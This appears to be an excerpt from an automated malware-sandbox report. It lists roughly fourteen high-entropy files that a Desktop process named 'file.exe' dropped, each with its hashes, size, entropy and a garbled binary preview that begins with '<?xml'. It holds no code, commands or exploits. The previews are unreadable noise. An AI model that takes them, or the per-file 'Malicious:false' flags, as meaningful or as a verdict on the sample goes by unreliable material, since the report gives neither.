          SSDEEP:48:0ax6E0APbmFSemybzkcv1esnGY4RRmmtENiD:0a4EhmFSehkjhu0
          MD5:438D781874B6D94F339975D79CAF584E
          SHA1:7478FB0E3CEF4AB476FF3CE9D3B9653F65137096
          SHA-256:8D578661E70DD90F4DB00A3B83187F7728CAD13592C78AA51D7DE5C9AD6EBA08
          SHA-512:750FEF071899EF3BFA4848D010D0E674666203791181449983115409322E8CAAD6F1FA149D544D41C51B2E8F8A39559741D283F05DF2F6D2E603EE39AE8193B0
          Malicious:false
          Preview:<?xml..M.(Z..t.i)...5.3..#Z9..6...........e.....E..}.I.L.m.DF.BV:d.(.h.gt.:_ .]B2BEVY.]..1.Kh........h.]..+H!....:..b....i...r.. ..jU....c......B5..A...r..W.........L........'...b........JW.q.v..\"t+u.[.Di....V...-.............-.B...Aau}....^....t.....w.~.. ..JD1.^.`..Iu&00.*...>.....!HS..P.>......:'@..=..f..m1.X4.....:.G....F.C~...o.C..E...;pA.^.F.... .-........k..... z..".....S.uU.......k?9.&..#.j...S...|.F..7D.'...g...k`......G...............@..Q............%.c.E.....L.......<r...]d....Y...41.(..Hp.ud.W^.........#.n57._.....^...<w=..U.......%Z.dv..].=....Bs(.+sp.X..)y.X.jMqQ...R.l.].>H...Y{'.......p.*n...[F..[zaM..p.*..xyU.4........o]Us....?..uH...k.r2I.r...F.~.....V....E..-8..Q.U'..=j....^L..&t.....Ii.@.s...S|C..........R...AK7....^O.....J.....0.....H....DXA..o......HE>.N.=s~p.#vNd@./...o.x...~..^..&`.e ...&KC{.....9O.....mVDjV...[..wd$......D.K.2..u.Um.q.L...4o>\.iDvpzElu.+.Ji....g)..vN....,g....`.I..".....`.\.Bo."....!`....F..F../.Zzz..
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1699
          Entropy (8bit):7.888568634548029
          Encrypted:false
          SSDEEP:48:svsHujCc4jGPzSpJM2HxYymrOpR7pptE/ziD:LHujC3QSpe2HxKrOpR7pptE/m
          MD5:48E65931DBBB26F2F1F5EF7FE45FBCFD
          SHA1:76FBB17C475D487D76F6BFE99F0C01328A68BBD1
          SHA-256:8B3F99076D5B85399F4E9FFBC9C34BD7223078FAAD22F12C787A355CC72DDCA6
          SHA-512:AD936FF38A3F8EE97DBD939952983944BC3B8D176FEEC7DC87550B0B080D59E643C4E664AE5C2D1DD721D806D243EC91D66503B4EB59BD79575FB16EB7C8F992
          Malicious:false
          Preview:<?xml..N.{^..h..&..l..:AI'P..oJ.i..:=|.>G...^B...[:....q/~....<.Y^o1.r.u.........^....l%......042.]W5.q..#]SP..Gq.b....9s/..t...Y..]V.-f^.n.=z.+]...B.a@.R..M.A..'e.f....y.v...nwR}..+QS]............t.cw...O._hn.\..U/._C.95.Fx..j[....p.+....#...C..;e....L...L....h8...N....+....".(..P..N*/F4^.i..................\....,..0.}l...y.O\:C..k5....0K..b.?R.[.;..H.Z.@O..y.4q._......9..9.l/I.6....9...E....o]..PS...2....6188.`g....@..L..[F>.wd..7/......sC.m.,.*..q^...v..J.I....|o...T..o(.h..}+oZs+.0<{dI....U...f.o..d.......w.=$...k..........7.7...T...a..Zw1bs.V..k*..=.!.'m.U5..^"....1.*$...8..c....=....?.E...&...H8..MHWo.....M.W....e..`.O@..."s.......[..._N...sa.(.;.Ds9C<...y.M...-Y....%.e.S..< ......1..Z......d..wi.'..-..]......w.Ew.|...U..dJ..2...p.....J.S.xYNT.A..~.......d.;GV\.&T|.......g.wUz3..:.....4....P.v..#....G.. .*............5.b.W..c.K.\...k.......]CmT.../O...R.........q.|..>*..(.)..Q8#.RFq(tk...G.....r%4..U.{.Y.c..e.n=...f......U'.%..S.r'.I2.&A
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1736
          Entropy (8bit):7.874707714847345
          Encrypted:false
          SSDEEP:24:W3JBu2GHGCIqMHTFuz/SwYP4LKP2bxQ8JTYzYW8aXX2J12FxFAlnihrOtJUnWS4u:EB/NCt9A6KPITYzD8aH2eFTAwhrLWLiD
          MD5:A0A2A455C38BACA574C642B651D1D12F
          SHA1:DA2BB4BDCF20345DD9BA38D39C0352B89C1D11DA
          SHA-256:1223B4F6398804E0E0036F74330D58D25BAA760BC57C9746669E5F0A424DE869
          SHA-512:B0E828606505560F59CC25F8FAE7DDE8786F3F29C12CA7DCB36437112D494635062E5C85309E4612F51E4A384D388EA5A29E0FBE8285DAB5DB3309BB2FBD2E37
          Malicious:false
          Preview:<?xml'..:...<....o.........}.!...|Q...%.]w<R....h.]^&.(|e=...........m...:...P....+n..P.?...:....z..uRj.W.4..._.v.....0...y.:....`..X.J.(.u.,21...........\w..E.o.XRP..G.T...8.......z......BR.F/M~....'.a....5..~]...=c...X.2..V.$:}7.F%}i...d@...A^..I'H}.(.m.....BCp..c.8..{.I8~.S`..p.j...I.Tt..".&;oM~.X.f....8..y...O*/...V...u.}.#Q.~..YU q..-#.....w.TvN....s}..n.dW~.6$(....]4..w..x.}R...kY...v{.......q.~#.@nk...f.f?...Y..qRv.d..7..r...h.!............V..n.8./..........._#...I..c.j(M.z..2.?.Y...._.....]Q^..J.~.[,...6L...x.S....|.GY..O.T~.h..^...L.D....w....g....i..~.w..2!..B..Z.y.!"...${.n.yh..m..O.G;.h.(>.....w.dZ.g.+...g.rQ...6..f!..d?.AB%.;.$.*".g#"nW..3...4..]{..xW...+.U..U.".!.....`...N.........t........m,]q...q.|.N..\i....#JR.~b..v%.......@...,..L:p...O.(M7~73Q.#pi?..R...%...(.:s/.CZ.o....._]C.Q...P...Ew%.m.....B...]mm.%.g...y.........|.*.3.7../....u..{.b..ha.....O"..\.2....f...5.-.&........Ds....QR.....r.S[.#.sN..W.....p.Q@5...}K
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1704
          Entropy (8bit):7.871751475367901
          Encrypted:false
          SSDEEP:48:s+sZKc8M/RShatYZO4+CXmT6c2ZiSsx0sfiD:s+swzMJ5Q+CWWcGiRVy
          MD5:3BEEB6417C40B30A6341FED3D50F2925
          SHA1:A10E50F173AFE358872C2124B2D7BB7754E328CE
          SHA-256:A53777654863D369434D79905EFD9385E9DB9CAF180804017AE6062835798F5E
          SHA-512:4DB5B60F167BA49EEF28B8F3FE2A0E7E87E168F5F42115452BA71D16B1B50EF52E4ABD988C70C866A8B8F882D38BF6449E36ED49FC6E7D5F4232C41341FD1CE8
          Malicious:false
          Preview:<?xml.[......g?.&BW.'.RA.*.'F1.p.MH .z...krD0.?X.qa.dTN...2...3..w...)..M...I...+....oq..,7.&.~...5_X..v..y<.rT.4j.i.....9.yk..L...#V.Q.c..f.....a.........dP<...Q%#}.?...c...t-..-P"..?..........{.YmM..t5....j.eZ.(........:....`'....FE..8.....t...............p.S%...?...V.[?C.$\)..L.Ah0.q.2...<.T.!.z......ls&Cj...k..\.f*W5..........h.'.,....AL+...I..g.KM..,... G:.o/..c.S.|.P.......k.*...6...T.q.Fp....7...........d.....353.!~<.W.....3N.r...]..=.u/x.4....r......"..CY@f._.O.vQ.9.y"'C..L'....g.....`( !..@...f.M#.u./L.bv8.i.];:.!.F..S.&3$$z.....,t.y*.;<...{..'L.I..qF.2c.yF..O.vG......o...5+......_..;G..A.K.2...v..x8......B@.2.X|.J'.q.P...W....z_.8.;....HN.j6g...A.....2..=#0..n0.c..C&.N..g.Z...x.w.5.q...p...a..1...|*:.inJ...~n.x<..|B..or...c....ly.Y.wt1%..F~.......@Fa.a..M.Ud@...x.S..C.`:.Gl.}.....S..z..\F....I......n.h.p..Z..b..y.....T.........V..?...wR.....Z.9..L.L.6.f........Z.c.....G.......+.P(.O....C.L.+'.7,.;.;.L+K&.....K..c..-.L
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1741
          Entropy (8bit):7.871103286182373
          Encrypted:false
          SSDEEP:24:WZ1ZMlQ18Xo60zBJDae2dOzIIwrDJLRLsvaabSpWoZi1o0PZQlTKkbf/iTkbD:iZ356cae2SLAczfoMjZQlIiD
          MD5:507BC072835AAC766CDCB73FD74C68BD
          SHA1:72972270C4F45C2052D411A412D67C02B525B371
          SHA-256:ED3801565893AA12B2CB9E45F47076D97967358ED01B8522548D77ACB1D7657F
          SHA-512:614863C4720F23949D7234306002D270210398E6573C11AFEDE50D7D7FAD2C9CF947674E9EA212A4B462CCE407B0142A7425B4C59D292C29A721A0F53DB774C6
          Malicious:false
          Preview:<?xmlO...`...+|.........2.A.6.w.?..k.U......]...QM.X....9RdB.....X....c`.,.K..kz........M...YN..K..+.....H=.e.ZZ..Q.4...D....i..........ck!\L9....zs......m..6 ..f...X......$...c..,}....`..q...w......&,.y...M&..Xt.r.{..OT..Q.w....k.l.m..P.@{.|]."..Z:.7.qY..._>..Q.+em.\Z.....C8BY...Z.....E8. .......$.....s.&.L.......H..R.7.}.^X...Q..y.....(d..^n...6..../.........(4.pj<..K-.'8....ve.I1.....z.W...&0.2Ou.+0U..N"...yY...'{f..w....D....V..+C.g...S...........kJ..y'..|....$.*....4[...t.4|5.D..n2c..r.I?..|q..Gp$.b..jC.L.....ZM..D.......I.1.Vx.MI.UD..l.@...r6]..G4......p2..,U...L..x.!..v..7Z..sW..uc...mf.........U/...@G...uj:(.g........9.i.yC..e.(.@jE........7.|H.F..-.P....,_...r..?.....+..U.(...=6*..8......W.k7LBA..)..;s,..7.u..{...;.6..\.v./&...a'#02..."7..0#6..X0.....H4........g....3..*p"..b...7*..:l...wDg~Y..0..n....J(.EN.9.wAdd.)k....J 3HI..M.k..y~q.elh-.j.V'p........V..G...}d.?.}2>{a.....X. ............d7.~.<.b.;(..;u...O.d..5...XD-....
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1703
          Entropy (8bit):7.89378730702582
          Encrypted:false
          SSDEEP:24:lnHafoQ2yYXq3WcAdcl8qeLeawLVtFNo4pn59po5q10QOLHXXdUgWLWf2N8NXiTW:R6fL2rcAAbSeawZPNx3o5PvTNUHLQoiD
          MD5:8F97FBFF74FC82D5A1714022019815A3
          SHA1:5CDE5952EB6D85AB94C615BEAA007FE2E1308C00
          SHA-256:225858B727C7695E5A40F492068C34CF8648FE285966275E976492A5C80FA7F4
          SHA-512:8BD4A143386E7A8D96E2B3F811115D9BC688728C45B41A5836F231D582824BBA868A778170DCFE538E106D8F1845037C3E4DFCF6F159B1657319C9FDB0A08F3A
          Malicious:false
          Preview:<?xml.p...X.(+.y........D.*....)3.P..@c.J._zA.,..I.$>....cn.,...B !Ah..JV ..s.A_.. (..-.....~M...D..?.l.....l........)..$....ww6...R.."&..H}......s..q.~...z...u.....#.e.....*.p.v.i...YSx..........;.Cy....[........H..Jv..t@/...+.J...#{..o...|....<..i..1?-....#.Y.'.N......%...u.$..{.^L .bPF.}.[.[...H.'u...Q"............P ..Z..'...j.......v......y...I..tz..H.........h..t.9...#..S$y.VCtS.$/x....e...?.U...V..i.F;..Z....q.7..T..,Co.Y&......u....k.....Jz..6.'.SG......3.~.(.wY....`.4.......%-...8D.'.f..t4q.+...m,X.r`z....D..`X...q.."x..`.1...{......3.Gt.Y...h.k=.w..M....!Z..m..ak..0...C.A.3g...*..h.,.l0..J..n..8..8.j._....Z.g....!^^..6.A.../W7...z0..u[..T..e xN ..tT..$M.....n.W.$...=...:.N*,...*....4..W@w,'....W.5..bC..s...e....L.#..e......Ye..He..G2....&k1.T.c$+...Aj...c&#o..#...B.....W.~4g.9;<8q.B.x:....../.........O..y.UWX.ia...%*...:.iUC...'..]e...>..]..C..........z.....qv..rH.*J.2..7..W...U6t..N.H.5|m....d'c|3.A.....|J..]}..T..A$.:N.l...es..
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1740
          Entropy (8bit):7.905487953368593
          Encrypted:false
          SSDEEP:48:BXDR+zQSqmeONhc8MvFFOmHZjAyruq/65uJcJiD:BXE7qmdNhcdTOm5jru4f
          MD5:464802D657BF93C9957859EEBE498793
          SHA1:49D225D27E8E8301E034440F23CF9F650514C684
          SHA-256:9172E8B6C9655A597B92862DEC13A766B8A86FE7063260E8AB48620D33AE852D
          SHA-512:50544C1793995AAFDE2DC31E6FBAC055BAC8CF0CC2DB12DB93DEBF5769491F0B9B76BA9A6F785B6DC818373C51608C5D40AFDD940CABB5B30E253189FB399087
          Malicious:false
          Preview:<?xml..e@h....c.;.4....yH...).].. D..^.l....@{.6.>...)..].|.w.]..H.T..&..xL...X...!(.4+W}.:...M4...j.....wj?;...Y.98.D5m...D%TX.G..c..<..U@.....0)..D..../.A.K=.g&S.._9e~.C.....l.0.oY....[_.mj............._.w\..:.W..../..cvU.|.!qN.0zG....n8.....]..2....t..`...a~..LB....]..GR.-.'UH.8.9........nhM.....\.s..1.@..2.Gye.....A..U.#b.8>.f.e,).....h\I......1..u..0V^G%.....B..k...9.....I..*m7...y.1...k%A.U...R*..I';{vu..T..H.W^.?.ZF.jh~*./q..?.0N..6BJ+.|.....&!w.....I.-..P.R$.O\....tCE.......0.p.[..W...l._.=..4CX0.q).<..6.a;. .....EG..*L1.V./.vy....{.4.7.......=}E ..o).....<.va.Y}..=84..o....O.qz.dsL...v....b.Z...#.'.........R..+..HMuK..zxD3I.OQ.!..r.:i%2.T...&t@....9.]....N.@`..>.<..../.......T.=.B3..E..I[..t.O..../rK."..W.*=...y...>.....zp..f..!...pm .~.7.....f..i.oG........x.$..P.......{.I5L.~......a..M..@.I.u|.E7...0..d;.K..... ..*..p?.2.....a...[...W5q.G...3...).Fo....!.O..\+..b......k^"7`.B..[.#.`qE...`m#..XE.n\........c..Q,.....'.7./..
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1713
          Entropy (8bit):7.878841170033844
          Encrypted:false
          SSDEEP:24:QQbFjkTxMwIFxN0Au5rDHUDAwcIPVaJ6Q12iM06Lvq1kOw4JhY5riTkbD:QQbFanIFxa399J6W2iM0uujW+iD
          MD5:192D8ADD65FD6C5B86041EFBB868F26D
          SHA1:DAC02B974369C9DBF3C737ED7F91A30316922DB6
          SHA-256:863146AD1DDFA8244FE6AFAFCD212DBDFE1388B02C49A971FF606F9A7D637FC3
          SHA-512:A1B4C39AC806860435D31B500EAE0AFBE0D5218F9249E33D4B11CBADB2A4A3F457BEEDDE52A2F79B8F159613ECBB4F175EDA88A6A8B8A3E96BE43A6E243BFEE5
          Malicious:false
          Preview:<?xmlnm.K.8..uC._=..`.$..*......._M,.t.tA....^$6}...Y$.:..N.=.jM....!.*{...2,}....4(x....,._8..T.....of[.&...B.EP.b6Z..f..f(...`\..#.......a.....4.C...{GL.......!.-.....@.;....E.......@)..md.U.=.'...Fp...k.E./.}..'..Z>'.e.........Em.N.Z.].`...r.T..1...!.)...ie..........s.?_!..%..!Aq.V../...n.....}G...V...#L.....Zy.."e...L.q.6.s3W..w..S....V...Jj5.>.!..[.0....l./.yy.n..'....Y.m.....(....*s#.......#yf.Pz.JMc.H.8.,..s9...6...d|....'...nZ/.|..!.....@..%..0V.._.^.V2...x'V...iE.sM4.v5..l}...(2..%.&.s=..\4..v2.I...I.C.}.p....K..n...Wv.B.. ..;........m@..n.k4.8.t..c-.....wr..In.9..K.Ux..\.;.(........x.h.Q.l.b..p.u.....iD.3...'0.6O.W...7k....X.;.-.....&.f."..T....K..e..y?.....j)t...QI.K..1.K..E.&M..p..G\.zH..^..."w..$..(.5.2}y.V.....)eP....o4..m].v......O...%..mbq.C.kT@.).....8..Caagg.l.$....#...n.kWt.i.;j..Od.yu......D...a...U....p....-..l..k).......6B...u'.>s...m.{J...I...........V. m.ju.M.[..Qe.*c.I.W....m.`X..].........B.1.........
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1750
          Entropy (8bit):7.885950620773304
          Encrypted:false
          SSDEEP:48:zsHx5AyEZaM31YAKgoRK2YtAwbBPzQmCqWEXUPiD:zsHx5elKS2cs2r
          MD5:91A2BB071EFC4ECDB62BA279680C339A
          SHA1:181443D3A7D5BF2977BAA3BCF34ADBAEB0EC4393
          SHA-256:35D2C36DB0519F14A804B5780AA1AA57584FC111FFD08730747FE5342A70B94F
          SHA-512:08E817FF72CF3474169BB9E3F88E8EEFFB3CB3144FD6DB159588BDBA48F582F3411FF5FD98073DEBB02ABA742169D252B376DF5618815CA7905F09486104A3D0
          Malicious:false
          Preview:<?xml.d......%.E.`p.....l%.;Q-.R.s..1.X....`kl].V.C...UC.G.KR...+..C..=........&..Ep...P.{\..q.<.[x.a.P......a...V.....O...,..d..W....J.M......yD...jy...r.a...)F.S.Z*E5\...t*bMs....rl...u..?.G:S..O.$.j.o..d;S..g8.S0..~....,.z..B".HC..C&..&0}...F>.....p.7..6.y..N.(.Z.A.xT.R....L.(u{..H3?....&.....Ju..o.t.o..........46..X._{....c.)Y9e.\.vR.lR.^..d.lp`..G....!.^.....(H..#...)n..{...]...=d.....x..:.w...HS.......#F...i0..>1.....'......S.~..5-H2....M..K..........&2y_V..>Z..8....T.W,P..hL..8......6_..c.........h...!.C..?Q;.....{..&.W..,2.........V.(Z....m..!..B.._..O..]Z.....g..mW<.~2.}.u,....D...Ju)....d..n....?...N.>Sr...^..i~.../^GXd.7....Bp(U..I....P|..[.m......Y..3...9.W.`.....Un_H3.,...H..2.....o..9S.L.6..._._?...... ...c.3....+...N.R/0e..L.......ru.):so.#..|H.............{....'..6kq.n.".23..6..#~...9.....+.1..).._...,>d&.q.4.@~..?..%..6.`F+.H.8~}....a.kzZp.&..!J\...5.vd.7M"-...%."...$]......}....&...<.*...h....F 0....A*.W.()y._$...lw..j......m.{<..:...
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1693
          Entropy (8bit):7.879065064709458
          Encrypted:false
          SSDEEP:48:1/BZhhTcTlGpIYUAjMqodX8Nzbk1cgwCWiD:5Bf5cTM+YU8Mqoh8xCJ
          MD5:51098257C8149F755E4D9B8CAEF3575B
          SHA1:CD7C36E22B1880EE1E19D3D38D8564545E37836D
          SHA-256:803109C8519769D8B9D83E81732CD093653B206AE487A935CFC37E51EB82841F
          SHA-512:6095F6B8D6BB10EFBF5C2F2A0B81C55BA4A2EA530BB7A327B5FCA5912F2AD70E125B81378068FC35787A6833503E108F1907E53EBDFA2ACDC1C8215B936D86FE
          Malicious:false
          Preview:<?xml........W..-.._...N[?..%F..F..IE..?tM&.b.YltC..w1&....k...I<4..{....O..........L..4.wl..y$.oJ..h.S.. ?>.G..J..$..YV...7..;.T..+..%.. J.l+..!...n..\..3?...N-........i..(..e.p....^.}.#...n.fu..5{..b.....uf....F.k..........99..}...8..>U..0{...7=..0}.W.{.N...8...g...V..*U6..3.....|.L..J..H.......e...SM.h...r....-PvX..U.lPq^q../....R...X./^..(.~F..Rm81i".JZ.:.....A.....q..o..c}B..1..0...9r.L.5..<.zM`=?0j..0...*Y...ON..:f7./jM~..0..r..o.;..X..p.....F...E?u...n|........0.._.<...e..).n.8..#h{..`..V.}<...........A......)7.ct..vA...F.`....a.(..`b=..oF..t........2r.&..$He.i.......{g.....CE..lx....@>'....c..q.0.....A.V.-......",r<..lz.T/x+TEB.d.."........t.....[....-...G..$.... D.5.m.%.kv0.)..|B...$..e %,H....d.R.)<m.b...O.?...)&=[..D.e..\]../.....U.......R.........&:.1.......f[P.% .....q^........H WqL..;..~Y...}6....9..S.J.p...V..^.H..f...v...&..3......fT..7N"......l....Wb...w....G......j..[...|8._.=...].*z..U(6..d....(.L.h.Z.F...|21..".s.m..
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1730
          Entropy (8bit):7.890374521749178
          Encrypted:false
          SSDEEP:48:Rg1tk2/mY/DYnIafCH0Bs5WnW+T9WEzn2kTiD:Rg1tk2/mkjafCUBAirT4Ezn2kG
          MD5:2874EDA2E0BC60C2B93D64019D39416F
          SHA1:BB0EC00E94CF7B43443E031F1CC6DF2E33E2E3D2
          SHA-256:6B3535BF258B0018EB456ED9C699FC4FE9576E8A6A34352836E64E4B8C3571A2
          SHA-512:E352D5563E4CB80EF973051EBD5ED7D653060643C1BB4623CD170040E44687CBC1910E28010B24301BFF41CA1D3AF2ED2C1C43E41C1317E333E4C9E249A2C8B9
          Malicious:false
          Preview:<?xml..&R..,Y*].iD..`........U.W.].V.....@.[%s...>.....bG.......qX[....rHq.Q..(.;[x.t..wE......k.b...i.....n..I..(.Z0,3..H..Sl....b.( (..?.....3..g.......I.......t..........=C.0.N...'.u....t..h:..4!...'A6.0c.l.!>.yM[.r...@..x9..c..d|J...".`N.Gs..?.).....3.Q.7.5...h.$.....G...4.....R.../.%W^..)..V^C.2R.+...S\.R..n......d....|.R...t.Cu_.......1..g..._^L..."v.~~...N.WE.#..E..j..I..?.....KH.....g.tad.h.....k|...|....Wo5^.K._M...e....q[..h..5>.]*.m...c.G..=.~Me...........I.1...tc/SW....C.<y.....J:.".B...cv'^..N\e.q)......2...v.Q..gwM...U...?._.)..~..>..(]}~..!s;....r...M.f..`^..: .....{0Y.......Q..B.O..Z.p...a.|6..o?..CDcp....s..m,x..[.....r..$c..._r.$%..X.6..#....)2!n.l0..qL05.(.Jd.Y(..,h.a..X/...S....u..c..s1....&.x..J.{%..r..X....G.)...C.#.&'.dk..mj..N[.z1..j........@.8.....j......5F..:E.m...y.....X`.6....E..B..'.:RS....3?y...4...S.5.B...D.i....}...v`.J\............M........?3u1Qo.jwg.S.j..<~..0..."...$...Z_....r...~%.I:..R%...@".nCd.._#
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1697
          Entropy (8bit):7.858127177545371
          Encrypted:false
          SSDEEP:48:WcVjZTRFPeOiAt1kaJ9uvebvvH1CHc4VwFGdxxmIDjDiD:r1FWOiKJY2b884OF6xoIDq
          MD5:2F72AE9FCE8B3212A0DE7BAD6F91F11F
          SHA1:A4BA94A2E0667D293CC86899E1D142F1B4EFF42E
          SHA-256:1C38A35FEC0948558010C6E0C002B6D52DF71931F395CE417583C4F9D07C98BD
          SHA-512:A899058D7DE88FE0A7AD71AFE9C360185A13C327E3420737B2EF7C1C4AE8ACB589EF66F74B3FB93AA4918A16EA5FBEA800D9E5995DF8D1B066F398F4F507AF0C
          Malicious:false
          Preview:<?xmlft.......7.`.m.....*...O.........mw.&....7..,...x/.....v+..^.bC.'{...........r..$9.*.0+!:..._.-....^..'Q...-....Z(.2..B...........H>...Yd.....*..E<E..J..g....U..w.L.x.>N.V....h.k..8.f.e.......rf%..L.~..D....k.<.p.9..Q..gA.+.9..r.n,.&t.s.{...N..`.sO..[.q$....In...Z...[.6X..?hy.....zl....z... ...|...CU.../.E2..-r TM ...K.*_.....'...;.`HUU.t.<.t.EO..... .u.`xk.|s.|..:....C...v...k..7...Y..A[...{..T..c-f..........-.'.ta|.A..[..Fx.J..G=.}.c.`.\....(Q...(#/.L..q?....J....A..e...|...3:#.7.Y...l:.8.....8Y.+...,.l...t......V.=..... D...#a-%J......C...f...V...cr2h..=.5.T.t..D..{_y$x{.....93r..\z..V1%..r..A.]..oJ>....h.<....a.mj$,P.......o..@...{./K..j@..eD.Q.!.`...;h....vR&..u@...}.........6.&..p....h'..S.@."*..._.1..,..Vv..}....,...-.Q....xN.h$}.......l..&R...g;..ed.c56p.(.@<....o.u...(.EhW.P@J.e.H...s:b.dQ_.r..p>..,..C?D.....u....8....[.h,Gy.f%f..5[.".jz.."{...L.E..zF..D.u....8A.n..!w5x.......h....%...M.7....Z.:_e..p...0.?g...?....r..%-.y......e
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1734
          Entropy (8bit):7.879462034351293
          Encrypted:false
          SSDEEP:24:wPZX2KHEed42dgq2kgjJQL8GfazhdV2xT5N+c9UkWHbLuOrYcF1R7JiTkbD:FKjxezjJQZfaXV2TP+ciTOOrYaIiD
          MD5:F41D519F4C359C61949A9CF77CDF762E
          SHA1:107454939FA745C5CB5722FDCEDF4AF9AC82BA5B
          SHA-256:9FE4458E148A0F97C2DBE54212FBC9E9CDEA0A94DF988F3D30DC94F96E7C7F25
          SHA-512:290F1000B93EB25C33B8160C20C727E33F0339BBA960D1410C747C7BAF41935A649910017E889C8BC2B7A9925FB77254D040859C387D0756077DABA35BC66C38
          Malicious:false
          Preview:<?xml(...j...Y8...v.......>..`..j.?g.._9... F..h5.......0...2>..|....5.S(8V..C........:.#.a.."..I.G...S,.{.....$3....=..8..%.x...........e.fe..F....e_!...i0..b...DA......x?.....?/.....Zd.o..5.r...~|...3.cs....L...M.-.}.I..u.Y..... ....xG....6...c.u.W.. .....4..J..f$...O..=.....{..B.3...~..|.5.V[U.*...Q.........-.ba..~...%.<.j..\~J.~Q.).p..X.L....D|......Q....9..T@.n....!...4..`......+.X.J\.P].....iT.B.../x..~@.P......NLg..3...+c?a..(...t&...p?.A`+.x...Oi.w^..e.Y...Aa.kQ.......z...*.7....j..'...J9..u...i7^.(........eb.......tk.......B.W.k.....{.....W.g./M....Q.&w.3..Z.)t+.|m|....>..B$.....h...%..}.."..q.U../},F....E...\.Y9.e.....&.L....m*..*.O...I.Mu...4.P.E.0.p...F...$ .U*...>.S....e.. ...+....Z/n........tU.,.{.w.....+...U.=..A.%..8e.u...d...g...RQwDT.a.....>..?m....u.....A....U.U....R{........)......:~A.8.:..>.. I..[..@....._.W.L...wW..........Tg=Z.R...a.N.-..8:ZrFF.....z.........Gk........!.&.{l|$....&......uD..y........}......K
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1704
          Entropy (8bit):7.890810342481007
          Encrypted:false
          SSDEEP:48:eYEoWAi5Kp85fJL3HRUTkI0C2CvRuhTl18iD:tV2Ucfd3HRUABC3chTl1L
          MD5:54CE786313FB2D0A98A7293E8C5E0F20
          SHA1:EBDDB1C970EA4BCEC1F6AD86FCF05E1B62F2CD99
          SHA-256:FDC0AEE69CD4CC015B45146ADD9E9B422884F1DC52DFB0E2DD07D1F97498BA9A
          SHA-512:D0561C3DC7281C875CC1971DA92CFB87A85C92EED7F2A21504EE69E311782248F1AACC4A9DDB9C68860AEC95EE2396852522BE3BB4CFFAB10F2FD4C01C9939DA
          Malicious:false
          Preview:<?xml.G..C./lx.R.......L..5...T....I.+.*......$....6.,Z.../M.....`-....(b...`....].#..`.@iD.)..#V.Tn]P.s.Z9.{Y5<.|..v......(.Z.Ib.k......../.Lj{.BI.0.H.....^{e[....7.....m.U..VBK}f..X..O....U#..CI4.|..@K.......[..xy..Qq1..<..........>f.B..]e...g.N...M.KyE|.$.<.;...8....v..._.W./l..\.<._N..M.y...ld.7.&..]......p.T...Ik..$.k.(..y....o..8..x.L.:.:..%v.+>...4f.*..M...Vc..$v.2..9T.z...3&..E.?:t...^....5...0..D".R..!........p...&_...7.Y....$t.B.Gm.D.b...i...C2.{.t.F.._..?..U..}.>...H.E.d.-.\.....h0......\i..+c ..m.$..io...e.gC.k...su2.....^...I.&.......gi....K..FQq...k.@.7Hv#.gPl.M..i..?+..r...D."..0.....!]...a....\..?&.+z.[....t.........p.....3Kms .H.q.>..H.P2;. wA.N.E.)F.K..../.Q......G.......C\W.,..S'....Z...%3....(9*v..^5..9Z.\.7/N.........']\.I\....;....Iiv.1.....Wu:...x..U..b.....T..1u......'!....$.[..@SC."....o#y.)..VPc.....6'.;..W..S.d.d....<..rT.........3./).=p$]P.m[J/.x.[...1.H.Z.p.m....M.:xA.>Xc">g..;K.D...R.Sg(..BCn...g...sd.
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1741
          Entropy (8bit):7.876069875075672
          Encrypted:false
          SSDEEP:24:yGQj3eFln8/bOKuKVMnXl8N0Z5nESVcXH0BKQNpmeACiYgBPO+oVO2FIlhR0/9M1:yGO3uY/VMXk0QZ36pjhgUfVHuUfiD
          MD5:E0C68AB5DB77E383B2D741A64FBEAB2E
          SHA1:6741BBC770B08536D8C174D87F86A63683F3AB5A
          SHA-256:1A9D098E01C8FB41AD0E7D8951CFF61DC684EF0EA15B1F3FCB56091269B509EB
          SHA-512:2964B2630EBD705126D255CE864ABE008EEB4F5334261402ADEB3FBDC7C7F82447177CE91973F91D1F5FDFD78E5D6F04578EC1B10C757136747FF908047BDB1C
          Malicious:false
          Preview:<?xml...../.@...Q..I...U....2K.Z*zb'..v...q.!@...l...y.k.....[..?...)I..Y`S..C...Q:..Gw....bN...mb.....5P=y.!.i,.#..T/#.....m.C.gY..~.}u.\..X..P...a..Es....rU'.iC...........z..........q..C.wQ..\hO....y...6.Cr.....L.)HA<.e\.D..z.BdQ....K\..w......s.R.M1..}..3....'..,..6..5.X...*...;...m....Ar..Z........Sm..T;.b._..U.G'F..2.EAi1df..`.zw.m.g.....`.<..`.X..#_.%6p(.\{...k..M.....,.P@w$.e;.X..rf.~..>.l...6...P...7..qI.91....h..u.t.y..(.QR2p/.V..N...a..#QHu.q_...._.....:........ic...c..Z.Q..Y..).;.u...l.,.....d.m...dN..CD6.h@.....K...g.e..}..sLZ.p....E..>...-^X_a/..J..zj.b>.....2.0.' X.q..m.Y...@..XM.,LF.b..5....-.......Pg.>.Zlv..'q`y..x.[ ...v.n..^B..~m..t.3.nD.r(C.U...Sx...'.F.t..F.4Ly:in...a(.3..|.eI.3t7[.%J.)..>@..OH.i..3.f.c.;P..C.~..\.Tf..P..-.p......?.ro..@..Y..CA.....8.O>.+y.j.9..RJw..5.E.K........s..Nl........[m..P6...6*.Y*...Q...e2;!......=+T8..........@.@.M.U{7.uX..K...8..d5r.JM...n..k.7..[.m(.C$..t.Y..(.4i...er...$/O...<.....<.`
